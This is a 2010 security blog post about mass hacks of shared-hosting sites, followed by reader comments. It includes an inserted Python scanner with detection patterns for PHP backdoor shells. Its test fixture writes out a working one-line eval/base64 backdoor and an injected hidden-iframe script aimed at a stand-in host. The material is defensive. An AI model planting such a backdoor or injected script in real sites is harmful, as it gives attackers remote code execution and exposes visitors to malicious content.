Last week attacks – Some comments and updates

May 11, 2010, by David Dede


Last week was a busy one.

First, thousands of GoDaddy sites were hacked with the kdjkfjskdfjlskdjf.com malware.

A few days later, hundreds of Network Solutions sites were hacked using the php.ini/cgi-bin malware (including the US Treasury site).

The next day, thousands more sites at different providers (GoDaddy, DreamHost, HostGator, etc.) were hacked with the MW:MROBH:1 malware.

So, what was going on?

Network Solutions attack

The problem at Network Solutions was caused by an internal application used on their hosting platform, which is what allowed the exploit to happen. They have already fixed it, so the problem should not reoccur. The number of infected sites was around 500.

GoDaddy

GoDaddy blamed the users (saying they were running old WordPress versions) and did not provide us with any information about what happened. We know that WordPress was not the problem (we saw sites running the latest version get hacked), so the root cause is still unknown. Probably thousands of sites were hacked.

DreamHost

DreamHost contacted us and explained that on their platform the issue was caused by a "specific backdoor shell that we've seen used in conjunction with a variety of redirect and SEO related hacks." Around 550 accounts were affected. Their statement:

We've seen a dozen or so examples of this passed to us via support and have researched it ourselves. It seems to be related to a specific backdoor shell that we've seen used in conjunction with a variety of redirect and SEO related hacks.

A scan across all our server files for known shells was done across customer HTTP servers and they were deleted. 550 account owners were contacted with notification of the finding of this backdoor shell file and the changing of their related FTP passwords. They were also provided directions for removing some of the common derivative hacks that have been associated with it, including a link to your web site and further directions to make use of SFTP exclusively due to FTP's inherent security constraints. The great majority of these shells were added (as indicated by file date) in late November and December.

How are they getting in?

The Network Solutions issue was explained and fixed. At DreamHost, it was a PHP backdoor shell that, going by the file dates, had been planted months earlier. But what about the others? How were the attackers able to inject content into all of these sites?

Skyphire (and others) mentioned in our comments that the code injected into the infected files references a phpMyAdmin cookie, which could point to a bug (maybe a 0-day) in phpMyAdmin. That is a plausible cause, since all of those shared hosts run phpMyAdmin. This is the cookie check in the injected code:


getCookie("pma_visited_theme1");

We can't prove it. A cookie read inside injected JavaScript only shows that the attacker is aware of phpMyAdmin (for example, to behave differently for visitors who have used it); it does not by itself show that phpMyAdmin was the entry point. We will keep an eye on it to find out exactly what is going on. Have more info? Let us know.
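The DreamHost statement above describes the practical response on a shared host: sweep every customer web root for known backdoor shells, use file dates to narrow the attack window, and remove what is found; the phpMyAdmin cookie check is the one concrete indicator this post has for the injected content. The following is an added example, not code from the original post or from DreamHost or Sucuri, of a small scanner that does both. The shell signatures are generic, assumed patterns (eval over a decoder, eval or exec fed straight from request input, the /e modifier in preg_replace); the post does not publish the list DreamHost actually used. The sample web root is constructed inside the script so that it runs offline.

```python
import os
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Heuristic signatures for PHP backdoor shells seen on shared hosts. These are
# generic, assumed patterns for illustration; the post does not publish the
# signature list DreamHost actually used.
SHELL_SIGNATURES = {
    "eval_decode": re.compile(
        rb"\beval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I),
    "exec_from_request": re.compile(
        rb"\b(?:system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "eval_from_request": re.compile(rb"\beval\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "preg_replace_eval": re.compile(rb"preg_replace\s*\(\s*['\"][^'\"]+/\w*e\w*['\"]", re.I),
}

# Indicator quoted in the post: the injected JavaScript reads a phpMyAdmin
# theme cookie before acting.
INJECTION_SIGNATURES = {
    "pma_cookie_check": re.compile(rb"""getCookie\s*\(\s*["']pma_visited_theme1["']\s*\)"""),
}

SCAN_SUFFIXES = {".php", ".phtml", ".php5", ".inc", ".js", ".html", ".htm"}


def scan_file(path):
    """Return a list of (kind, signature_name) hits for one file."""
    data = Path(path).read_bytes()
    hits = [("shell", n) for n, rx in SHELL_SIGNATURES.items() if rx.search(data)]
    hits += [("injection", n) for n, rx in INJECTION_SIGNATURES.items() if rx.search(data)]
    return hits


def scan_tree(root, since=None):
    """Walk a web root and report files matching any signature.

    `since` (an aware datetime) is the start of the suspected attack window;
    files modified at or after it are flagged `recent`, mirroring the file-date
    triage in the DreamHost statement. Attackers can forge mtimes (touch), so
    treat the flag as a hint for prioritising review, never as proof of cleanliness.
    """
    root = Path(root)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = Path(dirpath) / fn
            if p.suffix.lower() not in SCAN_SUFFIXES:
                continue
            hits = scan_file(p)
            if not hits:
                continue
            mtime = datetime.fromtimestamp(p.stat().st_mtime, tz=timezone.utc)
            findings.append({
                "path": p.relative_to(root).as_posix(),
                "mtime": mtime,
                "recent": since is None or mtime >= since,
                "hits": hits,
            })
    return sorted(findings, key=lambda f: f["path"])


def _write(root, rel, content, when):
    """Create a constructed sample file and set its modification time."""
    p = Path(root) / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_text(content)
    ts = when.timestamp()
    os.utime(p, (ts, ts))
    return p


def build_sample_webroot():
    """Constructed WordPress-like tree: two clean files, one shell, one injected theme file."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    old = datetime(2009, 6, 1, tzinfo=timezone.utc)
    attack = datetime(2009, 12, 14, tzinfo=timezone.utc)  # inside the "late Nov/Dec" window
    _write(root, "index.php",
           "<?php define('WP_USE_THEMES', true); require './wp-blog-header.php';\n", old)
    # Legitimate base64 use without eval must not produce a hit.
    _write(root, "wp-content/plugins/gallery/thumb.php",
           "<?php $img = base64_decode($_POST['data']); file_put_contents($f, $img);\n", old)
    # Constructed minimal backdoor: evaluates attacker-supplied, base64-encoded PHP.
    _write(root, "wp-content/uploads/.cache.php",
           "<?php eval(base64_decode($_REQUEST['c'])); ?>\n", attack)
    # Constructed injected footer carrying the cookie check quoted in the post.
    _write(root, "wp-content/themes/twentyten/footer.php",
           "<?php wp_footer(); ?>\n<script>if(!getCookie(\"pma_visited_theme1\")){"
           "document.write('<iframe src=\"http://example.invalid/\" width=0 height=0></iframe>');}</script>\n",
           attack)
    return root


def demo():
    """Scan the constructed web root with the attack window starting 1 Nov 2009."""
    return scan_tree(build_sample_webroot(), since=datetime(2009, 11, 1, tzinfo=timezone.utc))


if __name__ == "__main__":
    for f in demo():
        flag = "RECENT" if f["recent"] else "old"
        print(f"{flag:6} {f['mtime']:%Y-%m-%d} {f['path']}  {f['hits']}")
```

Run against a real account with `scan_tree("/home/user/public_html", since=...)`. Signature scanning of this kind finds the common, lazily obfuscated shells and the one indicator known from this incident; it will not find a shell whose payload is split across files or hidden in a database row, so a clean result from it is not a clean bill of health, and the FTP password reset DreamHost performed still matters because the credential, not only the file, may be what the attacker holds.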


As always, if you are having difficulties getting your site cleaned up, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.


Categories: Sucuri Updates, Web Pros, Website Security, WordPress SecurityTags: Hacked Websites

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Anonymous

    May 11, 2010

    Been a tough 5 weeks. Appreciate all your coverage and help.

  2. Bourgy.com

    May 11, 2010

    Any guesses on the GoDaddy exploit?

  3. Bourgy.com

    May 12, 2010

    Just been hijacked again

  4. tintin

    May 12, 2010

    Hey Great post. Really a very nice piece of information.
    Thanks for sharing this

    Regards
    Web development solution

  5. Anonymous

    May 12, 2010

    GoDaddy is full of shit. They blamed WordPress in our case too. Do you think it might have been through our OpenX install? Thank you for your cleaner. That did the trick for us for now.

  6. Anonymous

    May 12, 2010

    This is one of the best posts I've seen in a month of this crap, and believe me I've read a lot of them… This morning my site got hacked for the 3rd time, and I'm REALLY TRULY ABSOLUTELY POSITIVE it's nothing I am or am not doing, do you hear that GoDaddy?? (and yes I've been running WP 2.9.2 since February, but as the good detective here points out, WP is NOT the issue – it's something with PHP).

    One thing for sure I discovered today: GoDaddy FAILS this test on PHP (this was also posted elsewhere on this excellent site):

    http://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/page__view__findpost__p__592577078

    http://core.trac.wordpress.org/ticket/11122

    GoDaddy had better come clean with the details about what's truly going on (they did not reveal significant details during their WPSecurityLock conf. call), or they will find customers leaving by the THOUSANDS, and SOON.

  7. Anonymous

    May 12, 2010

    People want answers! Without them we will not feel comfortable…

    Thank you Sucuri.net for helping provide them.

  8. lukeprog

    May 17, 2010

    I think my website got hacked by way of a virus getting on my machine and stealing my FTP password. My XP machine got a virus and within a few hours somebody said my website was showing them a virus. I'm on MediaTemple.
